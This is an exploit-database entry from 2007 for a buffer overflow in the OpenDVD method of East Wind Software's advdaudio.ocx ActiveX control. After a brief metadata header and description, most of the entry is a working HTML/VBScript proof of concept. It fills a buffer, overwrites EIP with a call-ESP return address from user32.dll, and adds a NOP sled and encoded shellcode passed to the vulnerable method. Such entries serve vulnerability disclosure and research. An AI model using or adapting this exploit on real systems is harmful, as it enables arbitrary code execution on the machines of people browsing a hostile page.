East Wind Software (advdaudio.ocx v. 1.5.1.1) 'OpenDVD' method Local Buffer Overflow

vendor:

advdaudio.ocx

by:

shinnai

7.5

CVSS

HIGH

Local Buffer Overflow

119

CWE

Product Name: advdaudio.ocx

Affected Version From: advdaudio.ocx v. 1.5.1.1

Affected Version To: advdaudio.ocx v. 1.5.1.1

Patch Exists: NO

Related CWE: Not available

CPE: Not available

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

2007

East Wind Software (advdaudio.ocx v. 1.5.1.1) ‘OpenDVD’ method Local Buffer Overflow

The 'OpenDVD' method in East Wind Software (advdaudio.ocx v. 1.5.1.1) is vulnerable to a local buffer overflow. An attacker can exploit this vulnerability to execute arbitrary code or crash the application.

Mitigation:

The vendor has not released a patch for this vulnerability. It is recommended to avoid using this software or update to a newer version if available.

Source

Exploit-DB raw data:

<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/05</b></p></span>
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">--------------------------------------------------------------------------------------
 <b>East Wind Software (advdaudio.ocx v. 1.5.1.1) 'OpenDVD' method Local Buffer Overflow</b>
 url: http://www.ewcad.com/
 price: $249

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
--------------------------------------------------------------------------------------

<object classid='clsid:995A778F-E846-48DD-94F2-280FDED1AADF' id='target' style="width: 450px; height: 50px"></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <input language=VBScript onclick=QuoteMe() type=button value="Quoting...">

<script language='vbscript'>
Sub tryMe
 buff_1 = String(380,"A")

 get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call ESP (from user32.dll)

 buff_2 = String(104,"A")

 nop = unescape("%90%90%90%90%90")

 shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
             unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
             unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
             unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
             unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
             unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
             unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
             unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
             unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
             unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
             unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
             unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
             unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
             unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
             unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
             unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
             unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
             unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
             unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
             unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
             unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
             unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")

 egg = buff_1 + get_EIP + buff_2 + get_EIP + nop + shellcode + nop

 target.OpenDVD egg
End Sub

Sub QuoteMe
 Dim MyMsg
 MyMsg = MsgBox("You can do anything but lay off of my Blue suede shoes." & vbCrLf & vbCrLf & _
                ":)", 64, "2007/05/05 - East Wind Software DVD Ripper")
End Sub
</script></span></span>
</code></pre>

# milw0rm.com [2007-05-05]